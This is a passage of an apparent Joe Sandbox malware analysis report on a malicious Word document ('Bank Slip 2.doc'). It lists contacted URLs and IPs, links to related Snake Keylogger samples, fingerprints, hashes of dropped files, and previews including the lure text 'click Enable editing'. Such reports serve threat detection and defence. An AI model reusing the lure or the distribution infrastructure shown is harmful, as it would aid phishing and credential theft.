                    http://checkip.dyndns.orgobie8920193.exe, 00000007.00000002.864677424.00000000022C5000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023A0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.comobie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.334obie8920193.exe, 00000007.00000002.864677424.0000000002367000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002392000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002385000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002374000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000023C0000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002317000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobie8920193.exe, 00000005.00000002.366421408.0000000002571000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000002.00000002.354913231.0000000004379000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.354581271.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe.2.dr, FcdBUj68lnCbMtB[1].exe.2.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.354581271.000000000063A000.00000004.00000020.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864185355.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    193.122.6.168
                    		unknownUnited States
                    		31898ORACLE-BMC-31898USfalse
                    188.114.96.3
                    		reallyfreegeoip.orgEuropean Union
                    		13335CLOUDFLARENETUStrue
                    193.122.130.0
                    		unknownUnited States
                    		31898ORACLE-BMC-31898USfalse
                    158.101.44.242
                    		checkip.dyndns.comUnited States
                    		31898ORACLE-BMC-31898USfalse
                    104.21.53.203
                    		ampol.topUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465556
                    Start date and time:2024-07-01 20:05:15 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Bank Slip 2.doc
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@25/5
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 34
                    • Number of non-executed functions: 10
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 75628.2303992625 for current running targets taking high CPU consumption
                    • Override analysis time to 151256.460798525 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1804 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: Bank Slip 2.doc

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:06:04API Interceptor275x Sleep call for process: EQNEDT32.EXE modified
                    14:06:08API Interceptor8653002x Sleep call for process: obie8920193.exe modified
                    14:06:12API Interceptor13x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    193.122.6.168JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    vsl particulars packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    new order.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    Prouduct list Specifictions.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    LAQ-PO088PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    IMG_0071191023.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • checkip.dyndns.org/
                    new purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    188.114.96.3QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • filetransfer.io/data-package/mHgyHEv5/download
                    file.exeGet hashmaliciousFormBookBrowse
                    • www.cavetta.org.mt/yhnb/
                    http://johnlewisfr.comGet hashmaliciousUnknownBrowse
                    • johnlewisfr.com/
                    cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
                    http://www.youkonew.anakembok.de/Get hashmaliciousHTMLPhisherBrowse
                    • www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
                    hnCn8gE6NH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • yenot.top/providerlowAuthApibigloadprotectflower.php
                    288292021 ABB.exeGet hashmaliciousFormBookBrowse
                    • www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a
                    eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                    • www.liposuctionclinics2.today/btrd/?OR-TJfQ=g2Awi9g0RhXmDXdNu5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5szlP5E4EhRYb22U+Mw==&2dc=kvXd-rKHCF
                    Purchase Order -JJ023639-PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • filetransfer.io/data-package/9a4iHwft/download
                    Techno_PO LV12406-00311.xla.xlsxGet hashmaliciousUnknownBrowse
                    • qr-in.com/cpGHnqq

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    reallyfreegeoip.orgMT_80362_72605XLS.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 188.114.97.3
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    oHchwlxMNG.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    zkB0qfWSJk.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.97.3
                    vsl particulars packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 188.114.96.3
                    checkip.dyndns.comMT_80362_72605XLS.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    oHchwlxMNG.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73
                    zkB0qfWSJk.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    scan copy.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.8.169
                    f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    vsl particulars packing list.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 132.226.247.73

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ORACLE-BMC-31898USMT_80362_72605XLS.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    zkB0qfWSJk.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    new order.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    CLOUDFLARENETUShttps://click.pstmrk.it/3s/marryatbali.com%2Fdev%2F/EUHQ/Il62AQ/AQ/b5b2a7e4-6441-4a86-be73-2bf498fd1e9a/1/MLzcqAxPmjGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.2.184
                    https://endress-dot-polynomial-net-415922.uk.r.appspot.com/Get hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDZIRt5HYOjqWnCYPyN2LzfWA5WJpqP15j9jckbuN-2BOb3WHvq-2F0cJQJdn87kO0MSPy0cFUfIeq9yRYQqhn4htwvkWsNx-2FFam80MMPtdHc4W-2BjtofBO6rARCMSHyY6bevTzA-3D-3Dl5B0_ZmIHaGi20aqBKA3sG1JfXxzr0sPFOA2uIfsKnhz-2FHsHlNN56Un7vVp-2FHLlgOEVpr0kMJXFtRNAtOmyfAL3Lkes92MiYR3EbwQLlO4as4ETAbkJiOU1P-2F6SWFB0T3LaiXQjVG47m8S-2B1KmL8spseUk6IF4zRohQ-2B-2FFQktOHSnuyuc8HWSvn8BvqxHU3iGIxrIS-2FUCmGYTBpWBLsLVoZYmGg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.2.184
                    8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                    • 172.67.194.145
                    SecuriteInfo.com.Win32.BootkitX-gen.7605.8583.exeGet hashmaliciousBabuk, Clipboard Hijacker, DjvuBrowse
                    • 188.114.97.3
                    PO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                    • 104.26.13.205
                    http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDefjjvAc1VCRhzhBKQTVpjzhejQ8Rhu1zO1vWGAUfUeULJrKwFSbIOyWIUfIv-2Flo3yTYESP-2B78w2V31KWz3gTVG4x9fJGaMxyv5FQX0-2FC02SNh0q62WGV8moxgoMPN13ug-3D-3D0M2T_RK3E7lcHJh6RzNRog0V2Ww4F1i1LQS7pYYmvozE9BtFWFH8CBc2C7lCJRjsdH3VwNbJDjo91Q5gKMT9cCcdXw8AkweIV-2FNLnytbk6yO5x98zOjWQvldOWLzS2kOJk-2Bc9a9xwBmgqVDiuxw1Lx4HAzZ-2Bjhc2IjRsVwgsa2WyKs6mVKScqAKEYCpz9uhwD3RMPm3P4ijESTEtLH2hoAVbwO9XnUT-2BT6XJFuujR9hf41ZQ-3DGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    BIE (1).emlGet hashmaliciousPhisherBrowse
                    • 104.17.25.14
                    EFT 06282024, 013441 PM.htmlGet hashmaliciousUnknownBrowse
                    • 104.17.24.14
                    ORACLE-BMC-31898USMT_80362_72605XLS.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    zkB0qfWSJk.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    new order.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    ORACLE-BMC-31898USMT_80362_72605XLS.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    JgRVqrgNs4.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    H3fwQALXDX.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    zkB0qfWSJk.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.130.0
                    f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 193.122.6.168
                    new order.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242
                    MT Marine Tiger.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 158.101.44.242

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    05af1f5ca1b87cc9cc9b25185115607dScan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                    • 188.114.96.3
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 188.114.96.3
                    20240506_12082.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 188.114.96.3
                    zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
                    • 188.114.96.3
                    Plata.docx.docGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    gFTk7fAh55.rtfGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    7dcce5b76c8b17472d024758970a406bScan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
                    • 104.21.53.203
                    RFQ_4155965-EU2406.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 104.21.53.203
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 104.21.53.203
                    20240506_12082.xlsGet hashmaliciousUnknownBrowse
                    • 104.21.53.203
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 104.21.53.203
                    zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
                    • 104.21.53.203
                    Renameme@1.xlsGet hashmaliciousUnknownBrowse
                    • 104.21.53.203
                    Quotation.xlsGet hashmaliciousRemcosBrowse
                    • 104.21.53.203
                    Renameme@1.xlsGet hashmaliciousUnknownBrowse
                    • 104.21.53.203
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
                    • 104.21.53.203

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:@...e...........................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):554504
                    Entropy (8bit):7.930758266319395
                    Encrypted:false
                    SSDEEP:12288:+RfMJlRPMhU1n75ZyoFXm5PpVHSyE7ZhvCgC3UGGqRyUs3PKspeuD3kR:pbRj5ZrXm57ktqRyp3PKSM
                    MD5:DBDACF479A9DD40133701E06E6DC401C
                    SHA1:5E78767CF2498D34FC27674FF326F2A7CE5AB2A3
                    SHA-256:A597F53ED7D5E4CC1AF67800969953F431C7C99467D75A42E3DB360D7302283C
                    SHA-512:F46D0FCE9AD0E9C4A9142E53D02AA903DC082872068DEA6597C8D22E6154F25976A309815A8EFD721B5451CEB3646976D69E664DB261BECD18F250B8FDAA89A6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0...... .......4... ...@....@.. ....................................@..................................4..O....@...............@...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B37302F7-876E-4976-9F51-EE39DA847933}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:CE338FE6899778AACFC28414F2D9498B
                    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{29430A93-7164-4349-8A64-66C896FAA64C}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):200192
                    Entropy (8bit):3.4930021702808727
                    Encrypted:false
                    SSDEEP:6144:LyemryemryemryemryemryemryemryemryemryemryemVKK:K
                    MD5:579E4057D3780D9D70F542FA611E7DC6
                    SHA1:8BF86DD3DB525335BBD308999427520ACC530552
                    SHA-256:4EE9F7F074D9276AB50B886AC35B39F58A8AEA03486CA5C2F5D5CB9909FCC654
                    SHA-512:C419FF0DD5454D934F331FB5799B66DE1923093F25F6D8FB2223FD306012C8FBAB2298167100A96F1688593CD495303B24B49EDBCE420E95F21F6C4F39327A9D
                    Malicious:false
                    Reputation:low
                    Preview:3.5.0.0.1.1.1.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{357DB24A-0983-48BF-8598-FD9D4AAB4B4E}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1536
